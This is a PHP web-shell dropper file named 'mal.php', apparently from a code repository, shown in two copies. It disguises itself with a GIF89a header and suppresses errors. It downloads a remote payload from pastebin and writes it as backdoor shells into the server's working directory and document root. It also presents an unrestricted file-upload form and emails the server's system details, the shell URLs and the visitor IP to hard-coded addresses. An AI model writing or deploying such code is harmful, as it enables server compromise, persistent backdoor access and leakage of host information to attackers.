vncloudsco/mal.php

## mal.php
GIF89a;
<?php
error_reporting(0);
function parah($url){
    $im = curl_init($url);
    curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($im, CURLOPT_HEADER, 0);
    return curl_exec($im);
    curl_close($im);
}
echo '<center><br><b>h0d3_g4nT3nG'.'<br>'.'Uname:'.php_uname().'<br></b></center>';
$asu =rand();
$filename="dont-dell$asu.php";
$fget=file_get_contents("https://pastebin.com/raw/UkW9ywcC");

// WGET Backdoor
$path=getcwd().DIRECTORY_SEPARATOR;
$fileopen=fopen("$path/$filename",'w');
$execfile=fwrite($fileopen,$fget);
    if($execfile)
    {
        echo "Success UP: $path$filename <br>";
    }
    else {
        echo "Failed execute newfile $filename in $path <br>";
    }
if(isset($_POST['Submit'])){
    $filedir = "";
    $maxfile = '2000000';
    $mode = '0644';
    $userfile_name = $_FILES['image']['name'];
    $userfile_tmp = $_FILES['image']['tmp_name'];
    if(isset($_FILES['image']['name'])) {
        $qx = $filedir.$userfile_name;
        @move_uploaded_file($userfile_tmp, $qx);
        @chmod ($qx, octdec($mode));
echo" <a href=$userfile_name><center><b>Sucess Upload :D ==> $userfile_name</b></center></a>";
}
}
else{
echo'<center><form method="POST" action="#" enctype="multipart/form-data"><input type="file" name="image"><br><input type="Submit" name="Submit" value="Upload"></form></center>';
}
$web = $_SERVER['HTTP_HOST']."";
$upload = $_SERVER['DOCUMENT_ROOT']. "/jembu$asu.php";
$config = parah("https://pastebin.com/raw/UkW9ywcC");
$open = fopen($upload, 'w');
fwrite($open, $config);
fclose($open);
if(file_exists($upload)){
    echo "Shell Ke Upload : http://$web/jembu$asu.php<br>" ;
}else {
  echo "Gagal Upload Shell -_- <br>";
}

$tujuanmail = 'barbarnime@gmail.com,tukangcekstil@hotmail.com';
$x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
$pesan_alert = "fix $x_path :p $path$filename \n Uname : ".php_uname()." \n Acess : http://$web/jembu$asu.php \n *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ] \n";
@mail($tujuanmail, "Timthumb Bot !!", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]");

?>
	GIF89a;
	<?php
	error_reporting(0);
	function parah($url){
	$im = curl_init($url);
	curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
	curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
	curl_setopt($im, CURLOPT_HEADER, 0);
	return curl_exec($im);
	curl_close($im);
	}
	echo '<center><br><b>h0d3_g4nT3nG'.'<br>'.'Uname:'.php_uname().'<br></b></center>';
	$asu =rand();
	$filename="dont-dell$asu.php";
	$fget=file_get_contents("https://pastebin.com/raw/UkW9ywcC");

	// WGET Backdoor
	$path=getcwd().DIRECTORY_SEPARATOR;
	$fileopen=fopen("$path/$filename",'w');
	$execfile=fwrite($fileopen,$fget);
	if($execfile)
	{
	echo "Success UP: $path$filename <br>";
	}
	else {
	echo "Failed execute newfile $filename in $path <br>";
	}
	if(isset($_POST['Submit'])){
	$filedir = "";
	$maxfile = '2000000';
	$mode = '0644';
	$userfile_name = $_FILES['image']['name'];
	$userfile_tmp = $_FILES['image']['tmp_name'];
	if(isset($_FILES['image']['name'])) {
	$qx = $filedir.$userfile_name;
	@move_uploaded_file($userfile_tmp, $qx);
	@chmod ($qx, octdec($mode));
	echo" <a href=$userfile_name><center><b>Sucess Upload :D ==> $userfile_name</b></center></a>";
	}
	}
	else{
	echo'<center><form method="POST" action="#" enctype="multipart/form-data"><input type="file" name="image"><br><input type="Submit" name="Submit" value="Upload"></form></center>';
	}
	$web = $_SERVER['HTTP_HOST']."";
	$upload = $_SERVER['DOCUMENT_ROOT']. "/jembu$asu.php";
	$config = parah("https://pastebin.com/raw/UkW9ywcC");
	$open = fopen($upload, 'w');
	fwrite($open, $config);
	fclose($open);
	if(file_exists($upload)){
	echo "Shell Ke Upload : http://$web/jembu$asu.php<br>" ;
	}else {
	echo "Gagal Upload Shell -_- <br>";
	}

	$tujuanmail = 'barbarnime@gmail.com,tukangcekstil@hotmail.com';
	$x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
	$pesan_alert = "fix $x_path :p $path$filename \n Uname : ".php_uname()." \n Acess : http://$web/jembu$asu.php \n *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ] \n";
	@mail($tujuanmail, "Timthumb Bot !!", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]");

	?>